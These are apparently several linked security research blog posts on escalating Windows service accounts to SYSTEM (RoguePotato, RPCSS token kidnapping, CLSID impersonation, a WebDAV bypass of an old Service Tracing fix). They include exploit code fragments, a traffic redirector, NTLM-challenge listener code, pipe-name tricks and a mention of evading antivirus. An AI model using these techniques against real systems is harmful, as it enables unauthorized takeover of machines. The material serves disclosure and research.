From NETWORK SERVICE to SYSTEM

Recently, there has been a good deal of research on how to escalate privileges by abusing the generic impersonation privileges usually assigned to SERVICE accounts.

Needless to say, a SERVICE account is required in order to abuse these privileges.

The latest, in order of time, “PrintSpoofer”, is probably the most dangerous/useful because it relies only on the “Spooler” service, which is enabled by default on all Windows versions.

On Windows 10 and Windows Server machines where WinRM is not enabled, you can use our “Rogue WinRM listener” in order to capture a SYSTEM token.

And of course, on Windows Server up to version 2016 and Windows 10 up to 1803, our Rotten/Juicy Potato is still kicking!

In this post I’m going to show you how it is possible to get SYSTEM privileges from the Network Service account, as described in Forshaw’s post “Sharing a Logon Session a Little Too Much”. I suggest you read it first if you haven’t already, as I won’t detail the internal mechanism here.

In short, if you can trick the “Network Service” account into writing to a named pipe over the “network” and are able to impersonate the pipe client, you can access the tokens stored in the RPCSS service (which runs as Network Service and contains a pile of treasures) and “steal” a SYSTEM token. This is possible because of some “weird” checks/assignments on the token’s Authentication ID. The token of the caller (coming from the RPCSS service) will have the Authentication ID of the service assigned, and if you impersonate this token you will have complete access to the RPCSS process, including its tokens (because the impersonated token belongs to the group “NT Service\RpcSs”).

Side note: here you can find some other “strange” behaviors based on AuthID.

Given that the local loopback interface (127.0.0.1) is considered a network logon/access, it’s possible to exploit this (mis)behavior locally with an all-in-one tool.

The easiest starting point is a compromised “Network Service” account with shell access, and that is where we will begin. In this situation, we can directly write via the loopback interface to the named pipe, impersonate the client, and access the RPCSS process tokens.

Note: For testing purposes, you can impersonate the “Network Service” account using psexec from an admin shell:

  • psexec64 -i -u “NT AUTHORITY\Network Service” cmd.exe

There are many ways to accomplish this task, for example with Forshaw’s NtObjectManager library in PowerShell (keep in mind that the latest MS Defender updates mark this library as malicious!).

But my goal was to create a standalone executable in plain old vanilla style, and given that I’m very lazy, I found most of the functions I needed in the old but always good incognito2 project. The source code is very useful and educational; it’s worth studying.

I reused the most relevant parts of the code and made some minor changes in order to adapt it to my needs and also to evade AVs.

Basically this is what it does:

  • start a Named Pipe server listening on a “random” pipe
  • start a Pipe Client thread, connect to the random pipe via “localhost” and write some data
  • in the pipe server, once the client connects, impersonate the client (coming from “RPCSS”)
  • list the tokens of all processes
  • if a SYSTEM token is available, impersonate it and execute your shell or whatever you prefer

The “adapted” source code for my POC can be found here: https://github.com/decoder-it/NetworkServiceExploit

That’s all 😉

 


No more JuicyPotato? Old story, welcome RoguePotato!

 

After the hype we (@splinter_code and I) created with our recent tweet, it’s time to reveal exactly what we did in order to get our beloved JuicyPotato kicking again… (don’t expect something disruptive 😉)

We won’t explain how the *potato exploits work, how they were fixed, etc.; there is so much literature about this, and Google is always your best friend!

Our starting point will be the “RogueWinRM” exploit.

In fact, we were trying to bypass the OXID resolver restrictions when we came across this strange behavior of BITS. But what was our original idea?

“(…) we found a solution by doing some redirection and implementing our own “Oxid Resolver”. The good news is that yes, we got a SYSTEM token! The bad one: it was only an identification token, really useless (…)”

Short recap

  • You try to initialize a DCOM object identified by a particular CLSID from an “IStorage Object” via standard marshalling (OBJREF_STANDARD)
  • The “IStorage” object contains, among other things, the OXID, OID, and IPID parameters needed for the OXID resolution in order to get the bindings required to connect to our DCOM object interfaces. Think of it as a sort of DNS query
  • From “Inside COM+: Base Services”: The OXID Resolver is a service that runs on every machine that supports COM+. It performs two important duties:
    • It stores the RPC string bindings that are necessary to connect with remote objects and provides them to local clients.
    • It sends ping messages to remote objects for which the local machine has clients and receives ping messages for objects running on the local machine. This aspect of the OXID Resolver supports the COM+ garbage collection mechanism.
  • The OXID resolver is part of the “rpcss” service and runs on port 135. Starting from Windows 10 1809 & Windows Server 2019, it is no longer possible to query the OXID resolver on a port other than 135
  • OXID resolutions are normally authenticated. We are only interested in the authentication part, which occurs via NTLM, in order to steal the token, so in our case we can specify just 32 random bytes for the OXID, OID, and IPID
  • If you specify a remote OXID resolver, the request will be processed with an “ANONYMOUS LOGON”

So what was our idea in our previous experiments?

  • Instruct the DCOM server to perform a remote OXID query by specifying a remote IP in the binding strings instead of “127.0.0.1”. This is done in the “stringbinding” structure
  • On the remote IP, where a machine under our control is running, set up a “socat” listener (or whatever you prefer) to redirect the OXID resolution requests to a “fake” OXID RPC server, created by us and listening on a port other than 135. The fake server can run on the same Windows machine we are trying to exploit, but it doesn’t have to
  • The fake OXID RPC server implements the “ResolveOxid2” server procedure
  • This function will resolve the client’s (ANONYMOUS LOGON) query by returning RPC bindings that point to another “fake” RPC server listening on a dedicated port under our control, hosted on the victim machine
  • The DCOM server will connect to this RPC server in order to perform the IRemUnknown2 interface call. When it connects to the second RPC server, an “Authentication Callback” is triggered, and if we have the SeImpersonatePrivilege we can impersonate the caller via an RpcImpersonateClient() call
  • And yes, it worked! We got a SYSTEM token, coming from the BITS service in this case, but unfortunately it was an identification token, really useless
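
The redirection machine in the second step only needs to relay TCP traffic back to the fake resolver; socat does this out of the box. As an illustration, a minimal Python equivalent (hosts and ports here are placeholders, not values from the original POC) could look like:

```python
import socket
import threading

def forward(src: socket.socket, dst: socket.socket) -> None:
    """Pump bytes from src to dst until either side closes."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close()
        dst.close()

def redirect(listen_port: int, target_host: str, target_port: int) -> None:
    """Accept connections on listen_port and relay them, in both
    directions, to target_host:target_port (what socat does in the
    exploit chain)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(("0.0.0.0", listen_port))
    server.listen(5)
    while True:
        client, _ = server.accept()
        upstream = socket.create_connection((target_host, target_port))
        threading.Thread(target=forward, args=(client, upstream), daemon=True).start()
        threading.Thread(target=forward, args=(upstream, client), daemon=True).start()
```

On the redirector you would run something like redirect(135, "<fake-resolver-host>", 9999), so that the victim’s OXID resolution request on port 135 lands on the fake resolver’s port.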

The good news

So we abandoned the research until a few days ago, when two interesting exploits/bugs were published:

  1. “Sharing a Logon Session a Little Too Much”, published by @tiraniddo. In this blog you can also find the post, along with a working POC, demonstrating how the NETWORK SERVICE account could elevate privileges (bug or feature?)
  2. The marvellous “PrintSpoofer” exploit published by @itm4n. In our scenario we are interested not in the exploit itself but in the “bug” in the named pipe path validation checks.

On a late evening a few days ago, @splinter_code sent me a message:

(@splinter_code) “If we resolve the fake OXID request by providing an RPC binding with our named pipe instead of the TCP/IP sequence, we should in theory be able to impersonate the NETWORK SERVICE account, and after that… SYSTEM is just a step beyond…”

(me) “Yeah, sounds good, let’s give it a try!”

And guess what? IT WORKED!!!

Let’s dig into the details.

The “fake” OXID Resolver

First of all, a little bit of context on how OXID resolution works is required to understand the whole picture.
This is what the flow looks like, taken from MSDN:

OXID resolution sequence

The client will be the RPCSS service, which will try to connect to our rogue OXID resolver (the server) in order to locate the binding information needed to connect to the specified DCOM object.

Consider that all the above requests done by the client in the OXID resolution sequence are authenticated (RPC Security Callback), impersonating the user running the COM server behind the CLSID we choose (usually the ones running as SYSTEM are of interest).
What the *potato exploits do is intercept this authentication and steal the token (well, technically it’s a bit more complicated: the authentication is forwarded to the local system OXID resolver, which does the real authentication, and *potato just alters some packets to steal the token… a classic MITM attack).
When this is done over the network (due to the MS fix), it results in an Anonymous Logon, quite useless for an EoP scenario.

Our initial idea was to exploit one of the OXID resolver’s (technically called IObjectExporter) methods and forge a response that could trigger a privileged authentication to our controlled listener.

Looking at the scheme above, two functions caught our attention: ServerAlive2 and ResolveOxid2.

The first one was not of interest to us because we couldn’t specify endpoint information (which is what we needed), so we always answered it with RPC_S_OK. This is an example of what a standard response looks like:

serveralive2_pcap

So we focused on the next one (ResolveOxid2), and what we saw was something interesting that we could abuse:

resolveoxid2_pcap

Observing the above traffic, which is a standard response captured from the real OXID resolver on a Windows machine, we quickly spotted that we could abuse this call by forging our own ResolveOxid2 response and specifying our controlled listener as the endpoint.
We can specify endpoint information in the format ipaddress[endpoint], and also the TowerId (more on that later).

But… why not register the binding information we need with the system OXID resolver, get the OID and OXID from the system, and ask for the unmarshalling of that?
Well, to our knowledge, the only way to do that is by registering a CLSID on the system, and for that you need Administrator privileges.

So our idea was to implement a whole OXID resolver that would always answer with our listener’s binding for any OXID/OID it receives: just a fake OXID resolver.

Let’s analyze the function ResolveOxid2 to understand how to forge our response:

[idempotent] error_status_t ResolveOxid2(
   [in] handle_t hRpc,
   [in] OXID* pOxid,
   [in] unsigned short cRequestedProtseqs,
   [in, ref, size_is(cRequestedProtseqs)] 
     unsigned short arRequestedProtseqs[],
   [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
   [out, ref] IPID* pipidRemUnknown,
   [out, ref] DWORD* pAuthnHint,
   [out, ref] COMVERSION* pComVersion
 );

What we need to do is fill the DUALSTRINGARRAY ppdsaOxidBindings with our controlled listener.
Well, that was a little bit tricky, but it is well documented by MS (in 1 and 2), so it was just a matter of trial and error to forge the right offsets/sizes for the packet.
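
As a sketch of that packing work, here is how a minimal DUALSTRINGARRAY with a single string binding could be built (this reflects our reading of the MS-DCOM layout; the empty security-binding set and the exact constants are illustrative, not the original exploit code):

```python
import struct

NCACN_NP = 0x0F  # RPC protocol tower id for connection-oriented named pipes

def pack_dualstringarray(tower_id: int, network_addr: str) -> bytes:
    """Pack a minimal DUALSTRINGARRAY with one string binding and no
    security bindings.  Per MS-DCOM, all fields are little-endian
    unsigned shorts and strings are null-terminated UTF-16LE; both
    the string-binding set and the security-binding set end with an
    extra null short."""
    # STRINGBINDING: wTowerId + aNetworkAddr + its null terminator,
    # then the extra null short closing the string-binding set.
    string_bindings = struct.pack("<H", tower_id)
    string_bindings += network_addr.encode("utf-16-le") + b"\x00\x00"
    string_bindings += b"\x00\x00"
    # Empty SECURITYBINDING set: just the terminating null short.
    security_bindings = b"\x00\x00"
    sec_offset = len(string_bindings) // 2   # offset in shorts, not bytes
    num_entries = (len(string_bindings) + len(security_bindings)) // 2
    return struct.pack("<HH", num_entries, sec_offset) + string_bindings + security_bindings
```

For example, pack_dualstringarray(NCACN_NP, "localhost/pipe/roguepotato[\\pipe\\epmapper]") yields the kind of binding blob discussed later in the post; getting wNumEntries and wSecurityOffset consistent is exactly the trial-and-error part mentioned above.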

Let’s recap: we can redirect the client to our controlled endpoint (aNetworkAddr), and we can choose the protocol sequence identifier constant that identifies the protocol to be used in the RPC calls (wTowerId).

There are multiple protocols supported by RPC (here is a list).

In the first attempt we tried ncacn_ip_tcp as the TowerId, which allows RPC straight over TCP.
We ran an RPC server (keep in mind that a “standard” user can set up and register an RPC server) exposing the IRemUnknown2 interface and tried to authenticate the request in our SecurityCallback by calling RpcImpersonateClient.
By returning ncacn_ip_tcp:localhost[9998] in the ResolveOxid2 response, an authentication to our RPC server (IRemUnknown2) was triggered, but unfortunately it was just an identification token…

iremunkown2

 

So that was a dead end… But what about “Connection-oriented named pipes” (ncacn_np)?

The named pipe Endpoint mapper

First of all, what is the “epmapper”? Well, it’s related to the “RpcEptMapper” service. This service resolves “RPC interface identifiers to transport endpoints”. Same concept as the OXID resolver, but for RPC.

The mapper listens on TCP port 135 but can also be queried via a special named pipe, “epmapper”.

This service shares the same process space as the “rpcss” service, and both of them run under the NETWORK SERVICE account. So if we are able to impersonate the account under this process, we can steal a SYSTEM token (because this process hosts juicy tokens)…

Our first try was to return a named pipe under our control in the ResolveOxid2 response:

ncacn_np:localhost[\pipe\roguepotato]

But observing the network traffic, RPCSS still connected to \pipe\epmapper. This is because, by protocol design, the epmapper named pipe must be used, and this is obviously a “reserved” name:

Capture

No way…

When we read the PrintSpoofer post, we were impressed by the clever trick of the named pipe path validation bypass (credits to @itm4n and @jonasLyk), where inserting a ‘/’ in the hostname gets converted into a partial path of the named pipe!

With that in mind we returned the following binding information:

ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]

And you know what? RPCSS was trying to connect to the nonexistent named pipe \roguepotato\pipe\epmapper:

named_pipe_not_found
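
Our understanding of the path transformation can be sketched like this (illustrative Python, not the real RPC runtime code):

```python
def resolve_np_binding(binding: str):
    """Sketch of the PrintSpoofer path trick applied to an ncacn_np
    binding: returns (validated hostname, UNC path, local pipe path)."""
    assert binding.startswith("ncacn_np:") and binding.endswith("]")
    rest = binding[len("ncacn_np:"):-1]
    host_part, endpoint = rest.split("[", 1)
    # The path validation only looks at the hostname up to the first '/'.
    hostname = host_part.split("/", 1)[0]
    # The full string is reused to build the UNC path, where '/' behaves
    # like '\', so everything after the hostname lands in the pipe name.
    unc = ("\\\\" + host_part + endpoint).replace("/", "\\")
    # \\server\pipe\<name> maps to the local pipe path \\.\pipe\<name>
    server, share, name = unc.lstrip("\\").split("\\", 2)
    local = "\\\\.\\" + share + "\\" + name
    return hostname, unc, local
```

Feeding it ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper] gives the validated hostname localhost but the local pipe path \\.\pipe\roguepotato\pipe\epmapper, which is exactly where our listener waits.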

Great! So we set up a pipe listener on \\.\pipe\roguepotato\pipe\epmapper, got the connection, and impersonated the client. Then we inspected the token with TokenViewer:

token_viewer

So we had an impersonation token of the NETWORK SERVICE account, and also the LUID of the RPCSS service!

Why that? Well, the answer was in the post mentioned above:

“if you can trick the “Network Service” account to write to a named pipe over the “network” and are able to impersonate the pipe, you can access the tokens stored in RPCSS service”

All the “magic” about the fake ResolveOxid2 response is happening in this piece of code:

resolveoxid2

The Token “Kidnapper”

Perfect! Now we just needed to perform the old and well-known Token Kidnapping technique to steal a SYSTEM token from the RPCSS service.

We set up a minimalist “stealer” which performs the following operations:

  • get the PID of the “rpcss” service
  • open the process, list all handles, and for each handle try to duplicate it and get the handle type
  • if the handle type is “Token” and the token owner is SYSTEM, try to impersonate it and launch a process with CreateProcessAsUser() or CreateProcessWithTokenW()
  • in order to get rid of the occasional “Access Denied” when trying to launch a process in Session 0, we also set the correct permissions on the Window Station/Desktop

Well, let’s unleash RoguePotato and watch our SYSTEM shell pop 😀

system_privs

Final Thoughts

You are probably a little bit confused at this point, so let’s do a recap. Under which circumstances can I use this exploit to get SYSTEM privileges?

  • You need a compromised account on the victim machine with impersonation privileges (but this is the prerequisite for all these types of exploits). A common scenario is code execution in a default IIS/MSSQL configuration.
  • If you are able to impersonate the NETWORK SERVICE account, or if the “spooler” service is not stopped, you can first try the other exploits mentioned before…
  • You need a machine under your control where you can perform the redirection, and this machine must be reachable on port 135 by the victim.
  • We set up a POC with 2 exe files. It is also possible to launch the fake OXID resolver in standalone mode on a Windows machine under our control when the victim’s firewall won’t accept incoming connections.
  • Extra mile: in the old *potato exploits, an alternate way of stealing the token was simply to set up a local RPC listener on a dedicated port instead of forging the local NTLM authentication; RpcImpersonateClient() would have done the rest.

To sum it up:

flow_graph_2

You can find the source code and POC of RoguePotato here.

Final note: We didn’t bother to report this “misbehavior?” to MS because they stated that elevating from a Local Service process (with SeImpersonate) to SYSTEM is an “expected behavior”. (RogueWinRm – Disclosure Timeline)

That’s all 😉

@splinter_code, @decoder_it


The impersonation game

I have to admit, I really love Windows impersonation tokens! So when it comes to the possibility to “steal” and/or impersonate a token I never give up!

This is also another chapter of the never ending story of my loved “JuicyPotato”.

So, here we are (refer to my previous posts in order to understand how we arrived at this point):

  • You cannot specify a custom port for the OXID resolver address in the latest Windows versions
  • If you redirect the OXID resolution requests to a remote server on port 135 under your control and then forward the request to your local fake RPC server, you will obtain only an ANONYMOUS LOGON.
  • If you resolve the OXID resolution request to a fake “RPC Server”, you will obtain an identification token during the IRemUnknown2 interface query.

The following image should hopefully describe the “big picture”:

 

But why this identification token and not an impersonation one? And are we sure that we will always get only an identification token? We need at least an impersonation token in order to elevate our privileges!

But first of all, we need to understand who or what is generating this behavior. A network capture of the NTLM authentication can help:

The verdict is clear: in the first NTLM message, the client sets the “Identify” flag, which means that the server should not impersonate the client.

Side note: don’t even try to change this flag (remember, we are performing a kind of MITM attack on the local NTLM authentication, so we could alter the value); the client would not answer our NTLM type 2 message!

But why does the client set this flag? Well, it probably all happens in this RPC client API call:

RPC_STATUS RpcBindingSetAuthInfoExA(
  RPC_BINDING_HANDLE       Binding,
  RPC_CSTR                 ServerPrincName,
  unsigned long            AuthnLevel,
  unsigned long            AuthnSvc,
  RPC_AUTH_IDENTITY_HANDLE AuthIdentity,
  unsigned long            AuthzSvc,
  RPC_SECURITY_QOS         *SecurityQos
);

More precisely in this structure:

typedef struct _RPC_SECURITY_QOS {
  unsigned long Version;
  unsigned long Capabilities;
  unsigned long IdentityTracking;
  unsigned long ImpersonationType;
} RPC_SECURITY_QOS, *PRPC_SECURITY_QOS;

The client can define the desired impersonation level before connecting to the server. At this point we can assume that this is the default:

ImpersonationType=RPC_C_IMP_LEVEL_IDENTIFY

for the COM security settings when svchost starts the service DLL inside svchost.exe.

This is also controlled via a registry key (thanks to @tiraniddo for reminding me of this) located under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, where the impersonation level can be defined, overriding the default value.
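
For reference, such an override is an ordinary registry setting. An illustrative .reg fragment for the “print” group (the value names are the documented per-group svchost COM security settings; the exact data shown is an assumption, check your own machine):

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\print]
; tell svchost to call CoInitializeSecurity with the parameters below
"CoInitializeSecurityParam"=dword:00000001
; 3 = RPC_C_IMP_LEVEL_IMPERSONATE
"ImpersonationLevel"=dword:00000003
```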

In the following screenshot we can observe that all services belonging to the “print” group will call the CoInitializeSecurity function with an impersonation level of 3 (Impersonate):

And which service belongs to this group?

It’s the “PrintNotify” service, which can be instantiated and accessed by the following DCOM server:

OK, let’s see what happens on a fully patched Windows 10 1909 if we try to initialize this object via the IStorageTrigger, redirect to our fake OXID resolver, and then intercept the authentication callbacks.

The first request, with an ANONYMOUS LOGON, is relative to the redirected OXID resolution request. The two subsequent ones are generated by the IRemUnknown2 queries, and this time we have impersonation tokens from SYSTEM!

And, consistent with the registry configuration, we can see that the impersonation parameter is indeed read from the registry:

But wait, there is still another problem:

The SERVICE users (typically the accounts we will “target” because they have impersonation privileges) cannot start/launch the service/DLL and do not belong to the INTERACTIVE group.

Again, no way? Well not exactly.

With my modified JuicyPotato, juicy_2 (see previous screenshot), running as “NT AUTHORITY\Local Service”, I tested all the CLSIDs (7268 on my Windows 10 1909) in order to find something else, and this is the result:

There were two other CLSIDs which impersonate LOCAL SYSTEM:

  1. {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} which is hosted by the obsolete ActiveX Installer service:


This service belongs to the “AxInstSVGroup” group, but surprisingly this group is not listed in the registry, so I would expect an identification token! This means that the previous assumption is not always true: the impersonation level is not exclusively controlled via the registry configuration…

2. {C41B1461-3F8C-4666-B512-6DF24DE566D1}. This one does not belong to a specific service but is related to an Intel Graphics Driver component, “IntelCpHeciSvc.exe”, which hosts a DCOM server.




Clearly, the presence of this driver depends on the hardware configuration of your machine.

The other CLSIDs impersonate the interactive user connected to the first session:

{354ff91b-5e49-4bdc-a8e6-1cb6c6877182} – SpatialAudioLicenseServerInteractiveUser

{38e441fb-3d16-422f-8750-b2dacec5cefc} – ComponentPackageSupportServer

{f8842f8e-dafe-4b37-9d38-4e0714a61149} – CastServerInteractiveUser

So if you have impersonation privileges and an admin is connected interactively, you could obtain his token and impersonate him.

I ran the same test on the CLSIDs of a Windows Server 2019 machine, but this time I was not able to get a SYSTEM impersonation token. The ActiveX Installer service is disabled by default on this OS. The only valid CLSIDs were the three relative to the interactive user.

Well that’s all for now, the Impersonation game never ends 😉

.. and thanks to @splinter_code

Source code can be found here


Chimichurri Reloaded - Giving a Second Life to a 10-year old Windows Vulnerability

This is a kind of follow-up to my last post, in which I discussed a technique that can be used for elevating privileges to SYSTEM when you have impersonation capabilities. In the last part, I explained how this type of vulnerability could be fixed and I even illustrated it with a concrete example of a workaround that was implemented by Microsoft 10 years ago in the context of the Service Tracing feature. Though, I also insinuated that this security measure could be bypassed. So, let’s see how we can make a 10-year old vulnerability great again…

What Are We Talking About?

I won’t assume that you’ve read all of my previous blog posts, so I’ll start things off with a brief recap.

Around 10 years ago, Cesar Cerrudo (@cesarcer) found that it was possible to use the Service Tracing feature of Windows as a way of capturing a SYSTEM token using a named pipe. As long as you had the SeImpersonatePrivilege privilege, you could then execute arbitrary code in the security context of this user. Back then, this was acknowledged by Microsoft as a vulnerability and it got the CVE ID CVE-2010-2554.

Let’s take the Service Tracing key corresponding to the RASMAN service as an example. The idea is simple, you first have to start a local named pipe server. Then, instead of setting a simple directory path as the target log file’s folder in the registry, you can specify the path of this named pipe.

In this example, \\localhost\pipe\tracing is set as the target directory. Then, as soon as EnableFileTracing is set to 1, the service will try to open its log file using the path \\localhost\pipe\tracing\RASMAN.LOG. So, if we create a named pipe with the name \\.\pipe\tracing\RASMAN.LOG, we will receive a connection and we can impersonate the service account by calling the ImpersonateNamedPipeClient function. Since RASMAN is running as NT AUTHORITY\SYSTEM, we eventually get a SYSTEM impersonation token.

Note: depending on the version of Windows, the log file open event sometimes doesn’t occur immediately when EnableFileTracing is set to 1. One way to trigger it reliably is to start the service. Note that the RASMAN service can be started by low-privileged users via the Service Control Manager (SCM).

Of course, if you try to do this on a version of Windows that is less than 10 years old, you’ll run into the same problem that is shown on the above screenshot. If you try to execute arbitrary code in the security context of the impersonated user, you’ll get the error code 1346, i.e. Either a required impersonation level was not provided, or the provided impersonation level is invalid. You could also get the error code 5, i.e. Access denied. It’s the result of a counter-measure that was enforced by Microsoft in this particular Windows feature.

I detailed this security update in my previous post. To put it simply, the flags SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION are now specified in the CreateFile function call, which is responsible for getting the initial handle on the target log file. Because of these flags, the resulting impersonation level of the token we get is now SecurityIdentification (level 2/4). Though, SecurityImpersonation (level 3/4) or SecurityDelegation (level 4/4) is required in order to fully impersonate the user.

Note: as a side note, you probably noticed that the message Unknown error 0x80070542 is printed on the command prompt instead of the actual Win32 error message. The reason for this is that I try to get the error message corresponding to the error code while impersonating the user. Because of the limited impersonation level, this code/message lookup fails.

Does it mean we are screwed? Short answer: yes, we are, because the token we get is kinda useless. Long answer: well, you’ll have to read the next parts… :wink:

A UNC Path?

In the previous part, we saw that if we specify the name of a pipe as the log file directory, we do get an impersonation token but we cannot use it to create a new process. OK but did you notice how I glossed over an important detail here? How did I specify the name of a pipe in the first place?

First you need to know how the final log file path is calculated. That’s trivial, it’s a simple string concatenation: <DIRECTORY>\<SERVICE_NAME>.LOG, where <DIRECTORY> is read from the registry (FileDirectory value). So, if you specify C:\Temp as the output directory for a service called Bar, the service will use C:\Temp\BAR.LOG as the path of its log file.
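Sketched in Python (purely illustrative), the whole path computation amounts to:

```python
def trace_log_path(file_directory: str, service_name: str) -> str:
    """The log path is a plain concatenation of the FileDirectory
    registry value and the upper-cased service name - the directory
    itself is never validated."""
    return file_directory + "\\" + service_name.upper() + ".LOG"

# A regular directory...
assert trace_log_path("C:\\Temp", "Bar") == "C:\\Temp\\BAR.LOG"
# ...but nothing stops the "directory" from being a named pipe path:
assert trace_log_path("\\\\localhost\\pipe\\tracing", "RASMAN") == \
    "\\\\localhost\\pipe\\tracing\\RASMAN.LOG"
```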

In this exploit though, we specified the name of a pipe rather than a regular directory by using a UNC path. On Windows, there are many ways to specify a path, and this is only one of them, but this post isn’t about that. Actually, UNC (Universal Naming Convention) is exactly what we need, but we need to use it slightly differently.

UNC paths are commonly used for accessing remote shares on a local network. For example, if you want to access the folder BAR on the volume FOO of the machine DUMMY, you’ll use the UNC path \\DUMMY\FOO\BAR. In this case, the client machine connects to the TCP port 445 of the target server and uses the SMB protocol to exchange data.

There is a slight variant of this example that you probably already know of. You can use a path such as \\DUMMY@4444\FOO\BAR in order to access a remote share on an arbitrary port (4444 in this example) rather than the default TCP port 445. Although the difference in the path is small, the implications are huge. The most obvious one is that the SMB protocol is no longer used. Instead, the client uses an extended version of the HTTP protocol, which is called WebDAV (Web Distributed Authoring and Versioning).
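A simplified model of how the host part of the path selects the transport (illustrative Python, not the actual redirector logic):

```python
def parse_unc(path: str):
    """Simplified view of how a UNC path selects its transport:
    an '@port' suffix on the host switches from SMB (TCP 445) to
    WebDAV on the given port."""
    assert path.startswith("\\\\")
    host_part, _, _share = path[2:].partition("\\")
    if "@" in host_part:
        host, port = host_part.split("@", 1)
        return host, int(port), "WebDAV"
    return host_part, 445, "SMB"
```

So \\DUMMY\FOO\BAR goes to DUMMY over SMB on port 445, while \\DUMMY@4444\FOO\BAR goes to DUMMY over WebDAV on port 4444.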

On Windows, WebDAV is handled by the WebClient service. If you check the description of this service, you can read the following:

Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these functions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

Although, WebDAV uses a completely different protocol, one thing remains: authentication. So, what if we create a local WebDAV server and use such a path as the output directory?

Hello, I’m Officer Dave. May I See Your ID, Please?

First things first, we need to edit the registry and change the value of FileDirectory. We will set \\127.0.0.1@4444\tracing instead of a named pipe path.

Thanks to netcat, we can easily open a socket and listen on the local TCP port 4444. After enabling the service tracing, here is what we get:

Interesting! We get an HTTP OPTIONS request. The User-Agent header also shows us that this is a WebDAV request but, apart from that, there’s not much to learn. Though, now that we know that the service is willing to communicate using WebDAV, we should reply and send an authentication request. :wink:

To do so, I created a simple PowerShell script that uses a System.Net.Sockets.TcpListener object to listen on an arbitrary port and send a hardcoded HTTP response to the first client that connects to the socket. Here is the content of the HTTP response we will send to the client:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: NTLM

If you are familiar with web application pentesting, there is a high chance you’ve encountered the WWW-Authenticate header with the value Basic quite a lot (e.g.: Apache htpasswd), but not necessarily NTLM. This value allows us to indicate that the client must authenticate using the 3-way NTLM authentication scheme. By the way, if you feel like you need to fill some gaps about NTLM, I highly recommend you to read this excellent post about NTLM relaying by @HackAndDo. These blog posts are always very well written. :slightly_smiling_face:
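As an illustration, the same behavior as the PowerShell script (listen once, answer with the hardcoded 401 challenge) can be reproduced in a few lines of Python; the port is a placeholder:

```python
import socket

# The hardcoded challenge asking the client for NTLM authentication.
RESPONSE = (
    b"HTTP/1.1 401 Unauthorized\r\n"
    b"WWW-Authenticate: NTLM\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

def serve_401(port: int) -> None:
    """Accept one connection, read the request (the OPTIONS probe from
    the WebClient service), and reply with the 401/NTLM challenge."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    client, _ = srv.accept()
    client.recv(4096)
    client.sendall(RESPONSE)
    client.close()
    srv.close()
```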

With the script running in the background, we get the following result:

At first glance, it looks like the service agreed to initiate the NTLM authentication and sent us its NTLM NEGOTIATE message. This is confirmed by the output of Wireshark.

This is a good start, we are definitely on the right track but there is one last thing to verify. This one last thing will decide whether all of this was for nothing or not: the Negotiate Identify flag.

The NTLM authentication protocol documentation is quite exhaustive. You can see the detailed structure of each message that is used in the protocol. In particular, this section explains how the NegotiateFlags value is calculated in the NEGOTIATE message. About the Identify flag, you can read:

So, if this bit is set, the client tells the server that it can request a token with an impersonation level of SecurityIdentification only. In other words, if this flag is set, we are back to square one. We won’t be able to get a proper impersonation token.
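The flag is easy to check programmatically too. Here is a small sketch based on the MS-NLMP message layout (the constant value is taken from the specification; the helper name is ours):

```python
import struct

NTLMSSP_NEGOTIATE_IDENTIFY = 0x00100000  # MS-NLMP NegotiateFlags bit

def negotiate_has_identify(msg: bytes) -> bool:
    """Check the Identify flag in an NTLM NEGOTIATE (type 1) message.
    Layout per MS-NLMP: 8-byte 'NTLMSSP\\0' signature, 4-byte message
    type, then the 4-byte little-endian NegotiateFlags field."""
    assert msg[:8] == b"NTLMSSP\x00"
    assert struct.unpack_from("<I", msg, 8)[0] == 1  # NEGOTIATE message
    flags = struct.unpack_from("<I", msg, 12)[0]
    return bool(flags & NTLMSSP_NEGOTIATE_IDENTIFY)
```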

Thanks to the amazing Wireshark dissectors, we can easily check the value of this flag.

The Identify flag is not set!!! :tada:

This means that we can bypass the patch and get an impersonation token that we can use to execute arbitrary code in the context of NT AUTHORITY\SYSTEM. What we need to do next is simply complete the NTLM authentication thanks to an NTLM negotiator. This will allow us to transform this raw NTLM exchange into a token that we can then use if we have impersonation privileges. Though, I won’t talk about this here because this subject is already covered by the *Potato exploits.

The below screenshot shows the result of the PoC I implemented.

A Quick Bug Analysis

There is still some work to do in order to fully understand why this trick works. I won’t write a detailed analysis here but I’ll share some insight.

First, there is one detail that you may have noticed while reading the previous part. The service is requesting the resource /tracing rather than /tracing/RASMAN.LOG. Weird, isn’t it? :thinking:

Since we specified \\127.0.0.1@4444\tracing as the directory path, you’d expect that the service uses the path \\127.0.0.1@4444\tracing\RASMAN.LOG and therefore requests /tracing/RASMAN.LOG. Of course, there is an explanation. If you take a quick look at the code of the TraceCreateClientFile function in rtutils.dll, you’ll see that, before trying to open the log file, it begins by checking whether the directory specified in the FileDirectory value exists.
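As a side note on why the request shows up this way at all: the WebDAV mini-redirector maps UNC paths of the form \\host@port\path to http://host:port/path. The sketch below is a simplification of that mapping (an assumption about the general form; the real redirector also handles things like the @SSL suffix and authentication):

```python
import re

def unc_to_webdav_url(unc: str) -> str:
    """Translate a WebDAV UNC path into the URL requested over HTTP."""
    m = re.match(r"\\\\([^@\\]+)(?:@(\d+))?\\(.*)", unc)
    if not m:
        raise ValueError("not a UNC path")
    host, port, path = m.group(1), m.group(2) or "80", m.group(3)
    return f"http://{host}:{port}/" + path.replace("\\", "/")

print(unc_to_webdav_url(r"\\127.0.0.1@4444\tracing"))
# -> http://127.0.0.1:4444/tracing
```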

